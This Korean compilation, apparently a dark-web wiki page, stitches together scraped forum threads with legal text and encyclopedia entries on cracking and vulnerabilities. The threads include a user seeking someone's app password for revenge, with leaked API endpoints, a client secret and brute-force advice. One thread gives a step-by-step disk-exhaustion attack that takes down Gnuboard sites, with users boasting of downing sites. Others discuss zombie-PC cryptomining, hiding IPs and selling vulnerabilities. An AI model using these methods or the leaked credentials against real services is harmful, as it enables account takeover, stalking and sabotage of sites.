http://c2djzrn6qx6kupkn.onion/res/51059.html



  • #10373 2019-2-3 오후 2:06 [삭제]

소규모 어플 아이디는 아는데 비밀번호만 알아내는거 어렵냐?

   1: 무슨 어플인데 어플 이름 알려주면 취약점 있나 살펴볼게     [삭제]
   2: 일본어플이고 쿠라스시야 한번봐줘 능력자형     [삭제]
   3: >2 힘들잖아. 모양은 작은 어플이지만 회원가입은 https://epark.jp/ 라는 어느 정도 규모 있는 사이트를 통해 이뤄지는데? 저거 어플에서 회원 가입 요청보내면     [삭제]
   4: >2 https://api-kura.epark.jp/v1/customer/create 여기로 요청보내면 얘가 https://v1.eparkapi.jp/1/member/user/create.json 얘로 요청 보냄     [삭제]
   5: >2 결국 뚫어야 하는건 epark api 서버임. 서버 주소는 54.199.173.77:443 아마존 aws 쓰고 있음.      [삭제]
   6: >2 https://v1.eparkapi.jp/1/member/oauth/token.json 얘로 로그인 하는데 비밀번호 오류 카운트 안함     [삭제]
   10: >6 비밀번호 맞을 때까지 brute-force 해보거나 dictionary attack 해봐라     [삭제]
   11: >10 나도 카운트 안하고 비밀번호 패턴도 단순(영숫자로만 8~16)해서 brute-force 생각해봤는데 한참 걸리긴 하겠더라.     [삭제]
   7: api 키값은 client_id: kura_app, client_secret: a110cb214b154b2ca6428631cc3f207e     [삭제]
   8: 형님...저거 불가능한가요?...사례비는 드릴게요...부탁드려봅니다ㅠ     [삭제]
   9: >8 서버 해킹해야하는데 나는 해커가 아니라서 못함.     [삭제]
   12: 형님 이게 지메일이나 인스타      [삭제]
   13: 비번해킹하는것보단 쉽나요?     [삭제]
   14: 영숫자로만인건 맞을거에요! 혹시 대신해주실수있으신가요? 사례는드리겠습니다ㅠ     [삭제]
   15: >14 소문자, 숫자만으로 8자리면 할만한데 대문자, 특수문자 섞여있거나 16자리면 시간이 너무 오래 걸려서 사실상 불가능함.     [삭제]
   16: 형님 잘아시는거같은데 서버를 해킹하는법은 없을까요?     [삭제]
   17: >16 서버 해킹을 왜 해? 비번만 알아내면 되는 건데?     [삭제]
   18: >16 저 정도 사이트 규모고 api로 만들어 공개할 정도면 왠만하면 입력값에 대해 보안상 허점 없어서 결국 서버 털어야 됨     [삭제]
   19: 능력자형님들 없으실까요ㅠㅠ살려주세요부탁올립니다...     [삭제]
   20: >19 도대체 무슨 이유로 비번 필요한건데 스토킹이라도 하나     [삭제]
   21: 네 꼭복수해야합니다ㅠ     [삭제]

http://jqu6my2mlqp4zuui.onion/p?id=10373


좀비 PC로 모네로 채굴[편집]

모네로 좀 모네로 광산 19/02/17(Sun)08:15:01 No.52031 모네로 좀비 모아본사람 있냐? ㅇㅅㅇ 수익 몇마리에 몇우너임


Anonymous 19/02/17(Sun)08:44:02 No.52032 호스팅풀 하나 먹지않는 이상 답 없다. 초딩들이 랜섬시절 환상에 빠져서 워드매크로 먹이고 잡아먹으려고 하는데 골로가는애들 한둘 본게 아니다. 옛날 단숨 잡아다가 홍보 돌리는 애들 처럼 안잡는게 아니라 코인으로 수익내는건 차원이 다른 문제거든 뭐 좆도 없고 잃을거 하나 없으면 진지하게 해봐라 별로 낚지도 못할것 같지만


Anonymous 19/02/18(Mon)06:16:56 No.52062 zombie PC 많이 만들어서 Monero 채굴하게 하면 그래도 용돈 벌이는 됨


강하영사랑 ㅇㅅㅇ잊지마 19/02/18(Mon)11:40:29 No.52085 모네로 채굴비용 150에서 200이상 들어온다 ㅇㅅㅇ 1만대기준


Anonymous 19/02/19(Tue)00:10:53 No.52114 모네로 좀비라는게 뭔소리임? 버는좀알려줘라 들만 알지말고 돕고살자 으로 100만원만 벌어도 알바나하면서 편하게살텐대


Anonymous 19/02/19(Tue)03:43:39 No.52121 >>>52114 다른 사람 컴퓨터악성 코드감염시켜서 좀비 pc로 만들라고. 너같은 컴맹은 하지도 못 해, 봊뉴비야.

http://c2djzrn6qx6kupkn.onion/res/52031.html


토토 해킹[편집]

  • #10474 2019-2-18 오후 11:07 [삭제]

토토 해킹 자세하게 좀 알려줄 샛끼 잇냐

   1: 아고라 보니까 웹해킹하면된다는데?? 근데 토토사이트들도 메이저들은 다 클라우드 써서 해킹하기 빡셀듯     [삭제]
   2: 그리고 토토 뭘 해킹할라고?? 걔들 다 프로그래머 끼고 서버 돌려서 엄한데 건드렸다간 너 진심 서해바다에 묻힘      [삭제]
   3: >2 웬만한 토토 서버들은 조폭+프로그래머가 운영함.ㅋㅋㅋ 잘못하면 드럼통에 시멘트랑 같이 담궈져서 바다에 버려짐.     [삭제]
   4: >3 보통 돈이 급한 프로그래머들한테 조폭이 접근해서 고용하는데, 조폭답게 나중에는 돈도 잘 안 주고 맨날 두들겨패고 하더라.     [삭제]
   5: >4 조폭들이 대가리가 나빠서 그럼. 직원들에게 도 잘 안 주고 폭행하면 그 조직이 제대로 굴러갈까? 나중에 경찰체포되면 앞장서서 다 불겠지.     [삭제]

http://jqu6my2mlqp4zuui.onion/p?id=10474


  • 한마디만 한다 19/02/16(Sat)01:34:34 No.51944

횽 진지하다 같이 큰 돈 만져볼 해커없냐? 토토 사이트 몇개 해킹하자 절대 안 걸려


Anonymous 19/02/16(Sat)02:12:53 No.51945 병신이냐? 해커가 있으면 지가 해킹해서 혼자 다 먹지 해킹도 할줄 모르는 너랑 왜 나눠먹겠냐?


Anonymous 19/02/16(Sat)02:13:54 No.51946 멍청아, 이런 망상할 시간에 해킹을 공부해라. 니가 아무리 이런 개소리 지껄인다고 들을 해커 하나 없으니까.

해킹을 공부하기는 싫고, 돈은 벌고 싶으니까 이런 개소리를 진지하게 내뱉는거겠지.


Anonymous 19/02/16(Sat)02:31:52 No.51949 > 51945 : 해커가 해킹한다고 혼자 절대 못해먹음 ㅋㅋㅋㅋ 작업 해놓은거 가지고 해먹는거지 내가 해킹까지해선 작업을 할수가 없으니까 해커를 쓸려는거지 병신아


Anonymous 19/02/16(Sat)02:38:37 No.51951 인문학 하는 애들이 항상 하는 말이 있지. 내가 좋은 아이디어가 있는데 그거 구현해줄 프로그래머 없냐고.

그럼 컴퓨터 공학과 졸업자들은 항상 얘기하지. 아이디어는 누구나 있는 거고, 그걸 실제로 구현하는 게 문제라고.

항상 문제는 컴퓨터 실력이지, 그 외의 것은 지나가던 개새끼를 시켜도 할 수 있다.

니가 돈을 못 버는 건, 니 컴퓨터 실력이 형편없기 때문이고.


Anonymous 19/02/16(Sat)02:42:24 No.51952 Python이나 Django같은 단순한 웹 프로그래밍도 못 하는 애한테 얘기해봤자 소용없어.


Anonymous 19/02/16(Sat)02:51:45 No.51954 > 51951 진짜 좆빠는 소리하고 있네 ㅋㅋㅋㅋㅋ 아이디어가 누구나 있기는 보니까 니 내끼는 좆도 못하는 병신이 씨부리고만 있네


Anonymous 19/02/16(Sat)03:17:34 No.51961 >>51954 해킹을 못 하면서 해킹으로 돈 벌 생각을 하는 것은, 그림을 못 그리면서 웹툰으로 돈 벌 생각하는 놈하고 동급이지.

스토리 작가가 없는 건 아니지만, 웹툰은 99%가 그림 작가고, 1%의 스토리 작가도 그림을 전혀 그릴 줄 모르는 사람이 아니라 그림도 그릴 줄 알지만 스토리쪽에 재능이 더 있어서 그거 하는 거고. 하지만 대부분은 그림 작가 혼자서 하지.

http://c2djzrn6qx6kupkn.onion/res/51944.html


  • #10483 2019-2-19 오후 9:32 [삭제]

토토 서버 프로그래머들이 그렇게 실력이 좋아? 자기네 서버 해킹 당하면 역추적해서 누군지 찾아낼 정도로?

1: 모든 요청을 토어 통해서 하면 토어를 뚫을 만한 실력자가 있지 않는 이상 찾을 수가.. [삭제]

2: >1 근데 토토 서버 해킹하는데 누가 요청을 다 토어를 통해서 하냐? [삭제]

http://jqu6my2mlqp4zuui.onion/p?id=10483

그누보드 내장 네이버 스마트 에디터 취약점으로 서버 다운시키기[편집]

  • 하영의언덕 잊지마ㅇㅅㅇ 19/02/15(Fri)03:12:08 No.51859

호출부호 9번입니다 21번서적 662 페이지 마지막문단 입니다 66서적 1702 페이지 마지막문단 입니다

호출부호 9번입니da

그누보드아미나빌더 취약점안내 그누보드아미나빌더라는 또라이이만든 웹페이지는 스맛트에디트라는 네이버에서만든 또라이같은기능이존재한당 이기능에는 또라이같고위험한 취약점이존재하는뎅 5년넘게 패치가되지않고있고 앞으로도 패치될일이없으니 마음껏 써먹어랑


Anonymous 19/02/15(Fri)03:13:36 No.51860 또라이네이버개발자가 천조국개발자소스퍼다가 만든 스맛트에디트에는 글을쓸때 사진첨부기능이 존재한당 그곳에는 보통 10장씩 고용량 사진을올릴수있게되어있당


Anonymous 19/02/15(Fri)03:15:29 No.51861 그럼거기에10메가바이트 사진10개를한방에100개정도연속으로올려보장

그리고업로드가전부다된후에전체삭제버튼을눌러보장 그리고 사진업로드화면을끄든 안끄든 글을쓰든 안쓰든 이사진은 사라지지않고 서버에 남아있당 그럼 서버에는 10멕아바이트 x 100 = 1000멕아바이트(1긱아바이트) 사진이실제론올라가있다 그릭오 이사진은 누가올렸는지 언제올렸는지 알수도없게되어있당 그누보드아미나와 네이버개발자가또라이이라 전체삭제버튼을눌러도실제론사진이삭제가안되는것이당 그리고누가올렸는지언제올렸는지아무도알수없게되어있다 그냥서버용량만초과된당 이거슬잘들이용해서 서버날려먹어라 30분정도면 보통 서버하나가 용량초과로 날라가게되어있당


Anonymous 19/02/15(Fri)03:20:01 No.51862 이것말고do 근누볻드와 야미너빌더에는 xss 권한취약점과 사진파일을통해 글쓴자의아이피를알아내는 취약점이존재하겠da

이취약점은네이버개발자가또라이라패치될일없으니 마음껏 서버를날리시오. 이방법으로 1기가씩 업로드하면지울수도없고누가올린건지도절대모른당

그릭오 네이버또라이개발자들이만든 xpressengine(구zero보드)에도 그nu보드와 마찬가지로 운영자권한취약점과 사용자아이피 서버아이피를 알아내는 취약점이존재하고있da 물론 남조선 사이버경찰들이 혁명가 하이코리아 neo를 잡기위해서 phpbb취약점도 연구중이da 하지만 neo는 그런거 안당한da 하이코리언은 취약점업da 그냥포기하ja


강하영사랑 잊지마ㅇㅅㅇ 19/02/15(Fri)03:30:19 No.51864 보통 30분정도면 서버의 하드용량 100기가byte를 너혼자서 차지할수있겠da 지울수도업다. 그릭oh 20맥아바이트짜리 gif로 10개씩을 동시에올려랑 그러면 gif를 해석하느라 cpu를 과부화해 사이트의속도도 느려진da 용량초과와 cpu를 날리거la


Anonymous 19/02/15(Fri)03:39:38 No.51865 니가 날라가게하고싶은 서버 스맛T에딧트 화면을 띄어노코 대용량사진 10장씩 1테라바이트를 한번에 올려노코 게임한판을 하고와라 그리고 전체삭제버튼을 눌러la 그러면 서버는 날라간da


Anonymous 19/02/15(Fri)08:35:11 No.51874 ㅋㅋㅋㅋ 시발진짜네 파일존나큰거 10개 올리고 전체삭제 눌렀는데 그대로올라가있노? 안그래도 맘에안드는 사이트있었는데 1000개만올리는거 예약걸어노코 자야겠네 씨불럼


Anonymous 19/02/15(Fri)22:20:49 No.51907 호출부호 섹스입니다 섹스잡지 1페이지 첫번째사진입니다 섹스합시다


Anonymous 19/02/16(Sat)10:09:05 No.52001 진짜네 다른취약점은 또없냐? 왜삭제가안되지


Anonymous 19/02/16(Sat)10:12:23 No.52002 내가 활동하는 사이트에 사진 2000개 올려놓고 롤한판하고오니까 서버 용량초과로 날라갔네 ㅋㅋㅋㅋ 하여간 존나 대충만들어요


Anonymous 19/02/16(Sat)11:33:51 No.52011

그릭오 네이버또라이개발자들이만든 xpressengine(구zero보드)에도 그nu보드와 마찬가지로 운영자권한취약점과 사용자아이피 서버아이피를 알아내는 취약점이존재하고있da 물론 후장섹스를 하기위해 아르바이트를 하고 있단다.


Anonymous 19/02/17(Sun)06:42:58 No.52030 띵동 엄창입니다.


Anonymous 19/02/17(Sun)09:13:23 No.52034 확인했습니다 부호 1004번 확인부탁드립니다 마지막페이지입니다 -사이버수사대


잘되노 Anonymous 19/02/17(Sun)10:45:29 No.52036 잘되는구만

그누보드 취약점이라기보다 스마트에디트 사진첨부 기능 취약점이네 근데 그누보드가 스마트에디트를 기본으로 탑재해놔서 이게 먹히네

10분만에 서버하나 용량초과시키고옴 ㅋ 개꿀잼

다른거 또 없냐?


Anonymous 19/02/18(Mon)06:18:24 No.52063 >>>52036 그누 보드든, 익스프레스엔진이든, 제로 보드든 국산은 다 보안 병신임.


Anonymous 19/02/18(Mon)06:58:05 No.52069 구란줄 알았는데 잘되네 그누보드 사이트 다먹힌다 ㅇㅇ 직접해봤음 전체삭제 눌르면 리스트에선 사라지지만 사진 실제로 다올라가있네

제일좋은게 글안써도 되니까 창하나 띄어놓고 예약걸고 한숨자면 서버 셧다운되있네

제로보드라는건 또뭐냐? 그것도알려줘봐라


Anonymous 19/02/18(Mon)07:03:15 No.52071 gnuboard log에는 기록 안 될지 몰라고, Apache나 nginx, 아니면 다른 곳에는 누가 업로드 했나 IP 주소가 기록될 수 있으니, 해외 IP 주소로 한 번 이상 세탁하고서 해라.


Anonymous 19/02/18(Mon)07:21:07 No.52072 시진핑 섹스비디오 팜 ㅍㅍㅍㅍㅍ EMAIL: [email protected]


Anonymous 19/02/18(Mon)09:26:14 No.52075 ㄴ ㅇㅇ 고맙다 너가올려준거냐? 안그래도 저까튼 사이트 있었는데 이걸로 3개 사이트날림 ddos보다 쌔네 하드 갉아먹는거라 그런가 무료 vpn 으로 움직이는 사진 4천개 예약 거는데까지 5분정도걸리더라 다른거 있으면 또알려줘라 혹시 취약점 돈주고 살수잇냐? ㅇㅇ


Anonymous 19/02/18(Mon)09:28:03 No.52076 ㄴ 혹시 비트코인으로 다른 취약점도 팔면 내가살게 ㅇㅇ 비트코인 200만원 작년에 넣은거 고대로있음 메일 알려줘라 팔생각있으면 사기는 안당한다


Anonymous 19/02/18(Mon)12:02:28 No.52090 >>52075 무료 VPN이 있긴 하냐? 무료 proxy의 경우 자기네 IP 주소와 함께 접속자 IP 주소도 보내는 경우가 대다수이므로 주의 요망. 유료 proxy server의 경우에나 접속자 IP 주소 숨겨주는 기능을 제공하는 경우가 많음.


Anonymous 19/02/18(Mon)12:15:45 No.52092 >>52076 ricochet:dmkslg7cuhznhuje 연락해줘 더많이 알려줄ge


Anonymous 19/02/18(Mon)12:22:44 No.52093 >>52072 Hey, Contact me [email protected]


Anonymous 19/02/19(Tue)07:39:50 No.52140 2015년 쯤부터 그누보드에 네이버 스마트 에디터가 포함돼서 배포됐나보네.


Anonymous 19/02/19(Tue)10:51:06 No.52148 국산은 별에별 취약점이 다있구만

하드 채워버리면 운영자 입장에선 좆같겠네 이거는 지우지도 못하는거냐? 좆팔 봅나 웃기노 ㅋ


Anonymous 19/02/19(Tue)12:28:07 No.52164 >>>52148 외산도 취약점이 있지만, 영어로 된 것들은 전세계에서 쓰니까 취약점이 금방금방 발견돼서 보안 취약점이 패치되는데 국산은 취약점이 잘 발견 안 되고, 발견돼도 한 두놈 해커만 알고있고 지들만 몰래 쓰니까 10년 지나도 보안 취약점 업데이트 안 되는 경우도 많음.

http://c2djzrn6qx6kupkn.onion/res/51859.html


  • 1: gnuboard log에는 기록 안 될지 몰라고, Apache나 nginx, 아니면 다른 곳에는 누가 업로드 했나 IP 주소가 기록될 수 있으니, 해외 IP 주소로 한 번 이상 세탁하고서 해라. [삭제]

2: ㄹㅇ로?? 집가서 확인해봄. 어찌 찾아냄?? 서버 터진건 걔네가 수동으로 복구함?? [삭제]

3: >2 로그가 웹 사이트 제작용 CMS에만 남는 게 아니라 아파치나 엔진엑스 같은 곳에도 남으니까. [삭제]

http://jqu6my2mlqp4zuui.onion/p?id=10472

정보통신망 이용촉진 및 정보보호 등에 관한 법률 제72조[편집]

정보통신망 이용촉진 및 정보보호 등에 관한 법률

  • 제48조(정보통신망 침해행위 등의 금지) ① 누구든지 정당한 접근권한 없이 또는 허용된 접근권한을 넘어 정보통신망에 침입하여서는 아니 된다.
② 누구든지 정당한 사유 없이 정보통신시스템, 데이터 또는 프로그램 등을 훼손·멸실·변경·위조하거나 그 운용을 방해할 수 있는 프로그램(이하 "악성프로그램"이라 한다)을 전달 또는 유포하여서는 아니 된다.
③ 누구든지 정보통신망의 안정적 운영을 방해할 목적으로 대량의 신호 또는 데이터를 보내거나 부정한 명령을 처리하도록 하는 등의 방법으로 정보통신망에 장애가 발생하게 하여서는 아니 된다.
[전문개정 2008.6.13]


  • 제72조(벌칙) ① 다음 각 호의 어느 하나에 해당하는 자는 3년 이하의 징역 또는 3천만원 이하의 벌금에 처한다.
1. 제48조제1항을 위반하여 정보통신망에 침입한 자
2. 제49조의2제1항을 위반하여 다른 사람의 개인정보를 수집한 자
3. 제53조제1항에 따른 등록을 하지 아니하고 그 업무를 수행한 자
4. 다음 각 목의 어느 하나에 해당하는 행위를 통하여 자금을 융통하여 준 자 또는 이를 알선한 자
가. 재화등의 판매·제공을 가장하거나 실제 매출금액을 초과하여 통신과금서비스에 의한 거래를 하거나 이를 대행하게 하는 행위
나. 통신과금서비스이용자로 하여금 통신과금서비스에 의하여 재화등을 구매·이용하도록 한 후 통신과금서비스이용자가 구매·이용한 재화등을 할인하여 매입하는 행위
5. 제66조를 위반하여 직무상 알게 된 비밀을 타인에게 누설하거나 직무 외의 목적으로 사용한 자
② 제1항제1호의 미수범은 처벌한다.
[전문개정 2008.6.13]


크래킹[편집]

크래킹(cracking)은 해킹의 하위 분류이다.

해킹이란 hack이란 단어의 의미에서 알 수 있듯이 대상을 분해해서 작동 원리를 파악하는 것을 말한다. 크래킹crack이라는 단어 그대로 어떤 대상을 파괴하는 행위를 말한다.


~~참고로 부수는게 만드는것보다 쉽다~~ 해킹 자체는 피해를 주기만 하는 행위가 아니고, 프로그램에 접속하여 간섭하는 것을 말한다 볼 수 있으나, 크래킹은 특정 목표에 피해를 주는 것을 목적으로 하고 있는 해킹을 뜻한다. 일반적으로 사람들이 인식하고 있는 '해킹'이라는 단어는 이 '크래킹'을 의미한다.

사실 일반 유저들이 일반적으로 생각하는 크래킹을 당할 일은 거의 없으나 PC방 등에선 윈도우즈XP의 보안 업데이트가 제대로 이루어지지 않는다는 점을 이용해 쉽게 크래킹을 한다. 또한 악성 코드와 함께 유저가 알아서 설치해주고 내 컴퓨터를 바보로 만들어주세요(…) 하는 경우[* 이런 경우는 대개 악성 코드가 정상적인 프로그램으로 위장하거나, 혹은 정상적인 프로그램에 숨어서 들어오는 경우이다. 소위 말하는 “트로이의 목마” 기법이라 할 수 있겠다.]도 있는데, 보통 이럴 때 쓰이는 해킹 프로그램은 상당히 수준낮고 오래된 프로그램이므로 마이크로소프트사의 보안패치만 잘해도 신경쓰지 않아도 될 일. 집에서는 보안업데이트를 꾸준히 하고 PC방에서는 가능하면 하드보안관 등이 설치된 PC를 이용하자.[* 사실 복구프로그램이 만능은 아니다. 복구프로그램을 완전히 무력화 시키기도 한다. 반드시 백신설치&보안패치가 필요하다. 링크]

크래킹의 피해에 대해 대부분은 온라인 게임을 통해 접하고, 학생들 사이의 크래킹에 대한 이야기는 대부분 게임 관련 이야기이므로, 보통 온라인 게임에서 이 행위가 이루어진다고 알고 있는 사람이 많을 지도 모르겠는데, 사실 온라인 게임은 그 빙산의 일각에 지나지 않는다. 기업과 기업 사이에도 서로 사이좋게 해킹을 해대며 커뮤니티 사이트 같은 곳은 아예 다른 나라에서 주민등록번호를 탈취하기 위해 해킹 하기도 하며[* 중국에서 이런 일을 하는 것으로 악명이 높다. 그러나 비단 크래킹의 피해 뿐만이 아니라 어떤 커뮤니티 사이트는 대놓고 돈받고 자기 회원들의 개인정보를 판매하기도 한다는 사실이 드러나 충격을 준 사건이 있었다. 그러나 대부분 가입약관에 암시적으로 이런 상황에 대해 적어놓아 뭐라 따지기도 힘들다. 자신의 정보유출을 막고싶다면 아이핀을 사용하거나 제발 가입약관좀 읽자.] 군사목적으로도 자국 내에 신나게 해킹을 해대고 있다. 정보가 중요해진 현대 사회에서는 전쟁이 일어나면 무기로 인한 전쟁도 중요하나 그보다 중요한것이 자신의 보안을 견고하게 쌓아올려 정보를 지키면서도 동시에 상대방의 정보를 신나게 털어가는 해킹 전쟁이 주류가 되는 경우도 심심찮게 발생한다.

상황이 이렇다보니 돈받고 크래킹을 대신해주는 전문 크래커도 있는 지경이며 이들과 보안회사와의 전쟁은 끊이지 않고 있다나 뭐라나.

그렇다고 영화나 만화에 나오는것같이 화려한 수법을 사용하는 크래커라거나 아니면 국가 보안시설에 해킹이 가능한 천재 크래커라거나 아예 각국 정보망과 기업의 정보망을 몰래 해킹하고 있어 실시간으로 정보를 수집한다서나 하는 크래커가 실존할 확률은 적다. 보통 이들은 방에서 키보드를 두드리면서 시키는 일 하지, 절대 한 목표만 지속적으로 건드려 잡힐 꼬리를 늘리는 짓[* 그런데 APT(Advanced Persistense Threat)공격과 같이 한 목표만 지속적으로 노리는 공격이 점점 늘어나고 있다, 대표적인 예로 2003년 에 일어난 타이탄 레인 작전 이나 2009년도에 일어난 오로라 작전 등이 있다.]은 하지 않으며, 국가 정보부같은곳은 곳은 아예 건드릴 생각도 안한다. 도대체 누가 수준급의 해커급 능력자들이 산재해 있는 곳에[* 초딩들은 잘 모르지만 사이버수사대만 해도 특채로 들어오기 위해서는 최소 3년 이상의 보안업체 관련 경력이 있어야 한다. 계급은 순경 바로 위의 직급인 경장. 그럴진대 경찰간부 전산직이나 역시나 7급인 국정원을 목표로 하는 사람들의 실력은... 더 이상의 설명이 必要韓紙??] 무단침입해 걸리면 벌금은 고사하고 감방에 박혀살거나 코렁탕 먹을 일을, 더더욱이 돈도 되지 않을 일을 위험을 무릅쓰고 저지르겠는가. 그냥 영화는 영화려니 하고 보자.

사실 많은 크래커들이 크래킹 하는 방법은 컴퓨터 소프트웨어를 조작하여 남의 컴퓨터를 해킹하는 것 뿐이라고 아는 사람들이 많은데 사실 사회공학적 해킹 기법이 상당히 많이 사용된다. 이것은 컴퓨터의 취약점이 아니라 사람의 취약점을 이용하는 것으로서, 유명한 해커인 케빈 미트닉에 따르면 밤을 세워서 컴퓨터 프로그램의 보안 취약점을 알아내는것보다 휴가 간 보안 관리 팀장의 목소리를 흉내내서 비서에게 직접 암호를 따낼 때 쾌감이 더욱 각별하다고 한다. 최근에는 소프트웨어적 취약점과 사회공학적 해킹 기법을 동시에 활용하는 해킹 기법도 늘고 있는 추세이다.

여담이지만 일반적으로 학생들 사이에서 악명이 높은 계정 크래킹은 보통 사람이 직접 조작하는 일보다 프로그램에 맡기는 경우가 많다. 특히 아이템 빼돌리기 같은것에서 사례로 들 일이 많은데, 한가지 예를 들자면 마비노기에서 어떤 사람이 해킹을 당했는데 npc상점에서 고가에 팔리고 실제 시세도 높은 장비품이 다 털렸는데 자기가 가진 아이템중 제일 비쌌을 프리미엄 섬머 뉴비웨어가 남아있었다는 이야기가 있다. 참고로 저 뉴비웨어는 플레이어간 시세는 정말 굉장히 높으나 실상은 시스템상 게임 시작하면 증정으로 주는 기본 아이템과 동급으로 취급되기에, 수리비도 싸고 장비품중 시스템상 분류는 최하위에 속한다.

그 외에 작업장에서는 돌릴 계정이 부족할 때도 크래킹을 한다고 한다.

어린 학생들이 해커나 크래커를 목표로 하게 되는 애니메이션이나 영화의 간지포풍나는 해킹배틀은 실제로는 말도 안 되는 일이다(...) --해커나 크래커는 손까락이 빛의 속도로 움직이죠.--

2011년 7월 과학동아 기획기사로 해킹 범죄 시나리오가 실렸다. 최근에 흔히 일어나는 크래킹 범죄 유형 중 다섯 가지를 알기 쉽게 서술하였으므로, 관심있으면 한번 읽어보자.

펌웨어를 덤프해서 커스텀 펌웨어를 만드는 것도 크래킹이다. [[3]] 에 가보면 좀 구식 mp3 플레이어를 크래킹 한다. (opensource GPL, Sourceforge)


정보통신망 이용촉진 및 정보보호 등에 관한 법률 제48조[편집]

||<#EEEEEE>정보통신망 이용촉진 및 정보보호 등에 관한 법률 제48조(정보통신망 침해행위 등의 금지) ① 누구든지 정당한 접근권한 없이 또는 허용된 접근권한을 넘어 정보통신망에 침입하여서는 아니 된다. ② 누구든지 정당한 사유 없이 정보통신시스템, 데이터 또는 프로그램 등을 훼손·멸실·변경·위조하거나 그 운용을 방해할 수 있는 프로그램(이하 “악성프로그램”이라 한다)을 전달 또는 유포하여서는 아니 된다. ③ 누구든지 정보통신망의 안정적 운영을 방해할 목적으로 대량의 신호 또는 데이터를 보내거나 부정한 명령을 처리하도록 하는 등의 방법으로 정보통신망에 장애가 발생하게 하여서는 아니 된다.

제71조(벌칙) 다음 각 호의 어느 하나에 해당하는 자는 5년 이하의 징역 또는 5천만원 이하의 벌금에 처한다. 1. 제22조제1항(제67조에 따라 준용되는 경우를 포함한다)을 위반하여 이용자의 동의를 받지 아니하고 개인정보를 수집한 자 2. 제23조제1항(제67조에 따라 준용되는 경우를 포함한다)을 위반하여 이용자의 동의를 받지 아니하고 개인의 권리·이익이나 사생활을 뚜렷하게 침해할 우려가 있는 개인정보를 수집한 자 3. 제24조, 제24조의2제1항 및 제2항 또는 제26조제3항(제67조에 따라 준용되는 경우를 포함한다)을 위반하여 개인정보를 이용하거나 제3자에게 제공한 자 및 그 사정을 알면서도 영리 또는 부정한 목적으로 개인정보를 제공받은 자 4. 제25조제1항(제67조에 따라 준용되는 경우를 포함한다)을 위반하여 이용자의 동의를 받지 아니하고 개인정보 취급위탁을 한 자 5. 제28조의2제1항(제67조에 따라 준용되는 경우를 포함한다)을 위반하여 이용자의 개인정보를 훼손·침해 또는 누설한 자 6. 제28조의2제2항을 위반하여 그 개인정보가 누설된 사정을 알면서도 영리 또는 부정한 목적으로 개인정보를 제공받은 자 7. 제30조제5항(제30조제7항, 제31조제3항 및 제67조에 따라 준용되는 경우를 포함한다)을 위반하여 필요한 조치를 하지 아니하고 개인정보를 제공하거나 이용한 자 8. 제31조제1항(제67조에 따라 준용되는 경우를 포함한다)을 위반하여 법정대리인의 동의를 받지 아니하고 만 14세 미만인 아동의 개인정보를 수집한 자 9. 제48조제2항을 위반하여 악성프로그램을 전달 또는 유포한 자 10. 제48조제3항을 위반하여 정보통신망에 장애가 발생하게 한 자 11. 제49조를 위반하여 타인의 정보를 훼손하거나 타인의 비밀을 침해·도용 또는 누설한 자

제72조(벌칙) ① 다음 각 호의 어느 하나에 해당하는 자는 3년 이하의 징역 또는 3천만원 이하의 벌금에 처한다. 1. 제48조제1항을 위반하여 정보통신망에 침입한 자 (이하생략) ② 제1항제1호의 미수범은 처벌한다.||


해킹 도구[편집]

해킹 도구(hacking tool)는 크래킹 공격을 할 수 있게 해주는 프로그램을 말한다. 공격대상 컴퓨터에 해킹도구를 설치하면 원격접속으로 모든 정보를 손쉽게 유출이 가능하다. 현재 보고된 해킹도구는 약 10만여종 이상이 되며 보통 3가지 형태로 분류된다.

해킹 도구의 예[편집]

  • 트로잔 도구(Trojan Tool)는 RAT (Remote Admin Tool)의 일종으로 메일의 첨부파일이나 정상적인 실행파일등에 병합된 형태로 잠입하여 실행되며 PC의 재부팅, 인터넷의 강제실행, 파일의 변형/삭제, 개인정보 및 금융정보의 유출, 시디롬의 개폐등의 기능을 수행하는 프로그램이다.
  • 암호 추출 프로그램은 암호 추출 기능을 이용하여 쿠키등 PC에 저장되어 있는 개인 및 금융정보를 유출하는 프로그램을 말한다.
  • 키로거(Keylogger)는 키후커 (Key Hooker)라고 부르기도 하며 키보드를 통해 입력되는 키값을 유출시켜 저장하며 특정 이메일로 저장된 기록을 전송하기도 하는 프로그램을 말한다.


보안 취약점[편집]

취약점(vulnerability) 또는 보안 취약점은 공격자가 시스템의 정보 보증을 낮추는데 사용되는 약점이다. 취약점은 세 요소의 교집합이다. 시스템 민감성 또는 결함, 공격자가 결함에 대한 접근 그리고 공격자가 결함에 대한 익스플로잇 가능성.[2] 취약점을 익스플로잇하기 위해서, 공격자는 반드시 시스템의 약점에 접속할 수 있는 적어도 하나의 툴이나 기법을 가져야 한다. 이 경우에, 취약점은 또한 공격 영역이라고도 불린다.

취약점 관리는 취약점을 확인, 분류, 치료 그리고 완화시키는 주기적인 과정이다.[3] 이 과정은 일반적으로 컴퓨터 시스템에서 소프트웨어 취약점을 나타낸다.

보안 위협은 취약점으로서 분류될 수 있다. 취약점의 사용을 같은 의미의 위험과 함께 사용하는 것은 헷갈릴 수 있다. 위험은 심각한 손실의 가능성과 관련된다. 취약점들 중에는 위험이 없는 것도 있다. 에를들면 영향을 받은 자산이 값을 가지고 있지 않은 경우가 있다. 공격을 구현하기 위해 사용될 수 있는 하나 이상의 취약점을 익스플로잇 가능한 취약점이라고 한다. 취약성의 창문(window of vulnerability)은 보안 구멍이 소개된 또는 사용중인 소프트웨어에서 분명해진 시간부터, 접근이 제거되고 보안이 바로잡히고, 공격이 비활성화된 시간 까지이다. - 제로 데이 공격을 보자.

보안 버그는 더 좁은 개념이다: 소프트웨어와 관련 없는 취약점이 있다:하드웨어, 사이트, 인적 취약점들이 소프트웨어 보안 버그와 관련 없는 것들의 예이다.

프로그래밍 언어에서 적절히 사용되기 어려운 구조체가 많은 취약점점들의 근원지이다.

정의[편집]

국제 표준화 기구 (ISO) 27005은 취약점(vulnerability)을:[4]

하나 이상의 위협에 의해 익스플로잇될 수 있는 자산 또는 자산들의 그룹의 약점.

자산은 정보 자원을 포함하는 비지니스 전략과 그것의 연속성 뿐만 아니라 조직의 임무를 지원하는 어떤 것도 될 수 있다.[5]

국제 인터넷 표준화 기구 (IETF) RFC 2828은 취약점(vulnerability)을:[6]

시스템의 디자인, 구현 또는 작업 그리고 관리에서의 결함이나 약점으로서, 시스템의 보안 정책을 침해하기 위해 익스플로잇될 수 있는 것.

취약점과 위험 인자 모델[편집]

자원은 위협적인 행동에 의해 익스플로잇될 수 있는 하나 이상의 취약점을 가질 수 있다. 결과는 잠재적으로 자원들의 비밀성, 무결성 또는 가용성을 위협할 수 있다.

